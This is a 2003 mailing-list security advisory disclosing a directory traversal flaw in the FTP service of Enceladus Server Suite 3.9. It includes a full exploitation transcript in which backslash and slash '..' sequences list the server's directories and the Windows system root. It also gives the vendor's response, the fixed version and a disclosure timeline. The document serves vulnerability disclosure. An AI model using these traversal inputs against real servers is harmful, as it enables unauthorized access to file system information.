Vulnwatch mailing list archives

Directory Traversal vulnerability found in Enceladus Server Suite version 3.9


From: matrix () infowarfare dk
Date: Tue, 21 Jan 2003 21:06:07 +0100

                 Directory Traversal vulnerability found in 
                      Enceladus Server Suite version 3.9
                               (FTP Service)
                                                         
                         Discovered by Dennis Rand
                            www.Infowarfare.dk
------------------------------------------------------------------------


SUMMARY
Enceladus Server Suite is an Internet/Intranet lightweight Web and FTP Server
for Windows, provides secure file sharing on any network! Perfect for
Broadband, Cable Modem, Small business and Personal Use. You don't have to be
an expert to setup file sharing or run your own web site and FTP Server!! This
Server Suite is One of the Easiest To Install and Operate!

A directory traversal vulnerability in the product allows remote attackers to
cause the server to traverse into directories that reside outside the bounding
FTP root directory. The default installation includes an anonymous user with
which this can be used.

DETAILS

Vulnerable systems:
 Windows NT 4.0 and Windows 2000 server fully patched
 *  Enceladus Server Suite version 3.9
 
Immune systems:
 * Enceladus Web and FTP Server Suite V3.9.11

Enceladus Server Suite version 3.9 fails to filter out "\.." and "/.."
sequences in specific command requests, allowing remote users to break out of
restricted directories and gain read access to the system directory structure.
This makes it possible to discover the directory structure outside the
configured areas.


The following transcript demonstrates a sample exploitation of the vulnerabilities:

Connected to 192.168.1.199.
220 Mollensoft FTP Server Ready.
User (192.168.1.199:(none)): anonymous
331 Password required for anonymous.
Password:
230 User anonymous logged in.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
index.html
readme.txt
226 Listing complete.
ftp: 24 bytes received in 0,00Seconds 24000,00Kbytes/sec.
ftp> cd ..
550 Access denied
ftp> cd ...
550 Access denied
ftp> cd \..\
550 Access denied
ftp> cd/../
Invalid command.
ftp> cd /../
550 Access denied
ftp> ls /../
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
226 Listing complete.
ftp> ls /../../
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
226 Listing complete.
ftp> ls \..\..\
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
226 Listing complete.
ftp> dir \..\..\
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
drwxr-xr-x  1 User     Group              0 Jan 19 10:33 backup-html
drwxr-xr-x  1 User     Group              0 Jan 19 10:33 cgi-bin
drwxr-xr-x  1 User     Group              0 Jan 19 10:46 config
-rwxr-xr-x  1 User     Group        1016037 Mar 21 00:34 ENCELADUSHELP.CHM
-rwxr-xr-x  1 User     Group         241664 Nov 24 23:57 EnceladusServer3.9.exe
drwxr-xr-x  1 User     Group              0 Jan 19 10:33 html
drwxr-xr-x  1 User     Group              0 Jan 19 10:33 logs
-rwxr-xr-x  1 User     Group          30880 Jan 19 10:45 UNINSTAL.DAT
drwxr-xr-x  1 User     Group              0 Jan 19 10:33 users
226 Listing complete.
ftp: 619 bytes received in 0,00Seconds 619000,00Kbytes/sec.
ftp> dir \..\..\..\..\..\..\..\
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
-rwxr-xr-x  1 User     Group              0 Dec 23 12:17 AUTOEXEC.BAT
-rwxr-xr-x  1 User     Group            278 Jan 18 08:49 boot.ini
-rwxr-xr-x  1 User     Group              0 Dec 23 12:17 CONFIG.SYS
drwxr-xr-x  1 User     Group              0 Jan 19 10:33 enceladus
-rwxr-xr-x  1 User     Group        5135127 Jan 19 10:32 EnceladusServerSuiteDemoV3.1.EXE
drwxr-xr-x  1 User     Group              0 Dec 23 12:25 I386
drwxr-xr-x  1 User     Group              0 Dec 23 22:22 Inetpub
drwxr-xr-x  1 User     Group              0 Dec 23 21:49 Installationsfiler til Windows Update
-rwxr-xr-x  1 User     Group              0 Dec 23 12:17 IO.SYS
-rwxr-xr-x  1 User     Group              0 Dec 23 12:17 MSDOS.SYS
drwxr-xr-x  1 User     Group              0 Dec 23 21:25 Multimedia Files
-rwxr-xr-x  1 User     Group          26816 Dec 23 22:30 NTDETECT.COM
-rwxr-xr-x  1 User     Group         156496 Dec 23 22:30 ntldr
drwxr-xr-x  1 User     Group              0 Dec 23 12:36 OptionPack
-rwxr-xr-x  1 User     Group      524288000 Jan 19 10:35 pagefile.sys
drwxr-xr-x  1 User     Group              0 Jan 19 10:19 Program Files
drwxr-xr-x  1 User     Group              0 Dec 23 12:24 RECYCLER
drwxr-xr-x  1 User     Group              0 Jan 19 10:45 TEMP
drwxr-xr-x  1 User     Group              0 Jan 19 10:36 WINNT
226 Listing complete.
ftp: 1340 bytes received in 0,13Seconds 10,31Kbytes/sec.
ftp> dir /../../../
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
-rwxr-xr-x  1 User     Group              0 Dec 23 12:17 AUTOEXEC.BAT
-rwxr-xr-x  1 User     Group            278 Jan 18 08:49 boot.ini
-rwxr-xr-x  1 User     Group              0 Dec 23 12:17 CONFIG.SYS
drwxr-xr-x  1 User     Group              0 Jan 19 10:33 enceladus
-rwxr-xr-x  1 User     Group        5135127 Jan 19 10:32 EnceladusServerSuiteDemoV3.1.EXE
drwxr-xr-x  1 User     Group              0 Dec 23 12:25 I386
drwxr-xr-x  1 User     Group              0 Dec 23 22:22 Inetpub
drwxr-xr-x  1 User     Group              0 Dec 23 21:49 Installationsfiler til Windows Update
-rwxr-xr-x  1 User     Group              0 Dec 23 12:17 IO.SYS
-rwxr-xr-x  1 User     Group              0 Dec 23 12:17 MSDOS.SYS
drwxr-xr-x  1 User     Group              0 Dec 23 21:25 Multimedia Files
-rwxr-xr-x  1 User     Group          26816 Dec 23 22:30 NTDETECT.COM
-rwxr-xr-x  1 User     Group         156496 Dec 23 22:30 ntldr
drwxr-xr-x  1 User     Group              0 Dec 23 12:36 OptionPack
-rwxr-xr-x  1 User     Group      524288000 Jan 19 10:35 pagefile.sys
drwxr-xr-x  1 User     Group              0 Jan 19 10:19 Program Files
drwxr-xr-x  1 User     Group              0 Dec 23 12:24 RECYCLER
drwxr-xr-x  1 User     Group              0 Jan 19 10:45 TEMP
drwxr-xr-x  1 User     Group              0 Jan 19 10:36 WINNT
226 Listing complete.
ftp: 1340 bytes received in 0,14Seconds 9,57Kbytes/sec.
ftp> bye
221 Goodbye.


Detection:
Enceladus Server Suite version 3.9 is vulnerable to the above-described
attacks. Earlier versions may be susceptible as well. To determine if a
specific implementation is vulnerable, experiment by following the above
transcript.

Vendor response:
Good thing you can't "put" or "get" any files... Thanks for the heads up, I
thought I had fixed the directory listing. Not too much harm in getting a
directory listing (still needs to be fixed).


Support
Enceladus Web and FTP Server Suite V3.9.11
The latest version is available from  http://www.mollensoft.com/product3.htm


Disclosure timeline:
19/01/2003 Found the Vulnerability.
19/01/2003 Author notified. Sent mail to support () mollensoft com
21/01/2003 Responses received from MollenSoft
21/01/2003 Public Disclosure.


ADDITIONAL INFORMATION
The vulnerability was discovered by Dennis Rand <matrix () infowarfare dk>

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any
kind. In no event shall we be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits or
special damages.



